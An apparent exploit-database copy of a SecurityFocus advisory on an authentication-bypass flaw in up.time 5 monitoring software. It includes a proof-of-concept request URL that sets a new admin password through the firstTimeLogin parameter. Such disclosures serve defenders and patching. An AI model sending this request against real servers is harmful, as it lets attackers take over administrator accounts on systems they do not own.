14 lines
No EOL
464 B
Text
14 lines
No EOL
464 B
Text
source: http://www.securityfocus.com/bid/47599/info
|
|
|
|
up.time software is prone to a remote authentication-bypass vulnerability.
|
|
|
|
Attackers can exploit this issue to bypass authentication and perform unauthorized actions.
|
|
|
|
up.time 5 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com:9999/index.php?userid=admin
|
|
&firstTimeLogin=True
|
|
&password=admin
|
|
&confirmPassword=admin
|
|
&adminEmail=admin () admin
|
|
&monitorEmail=admin () admin |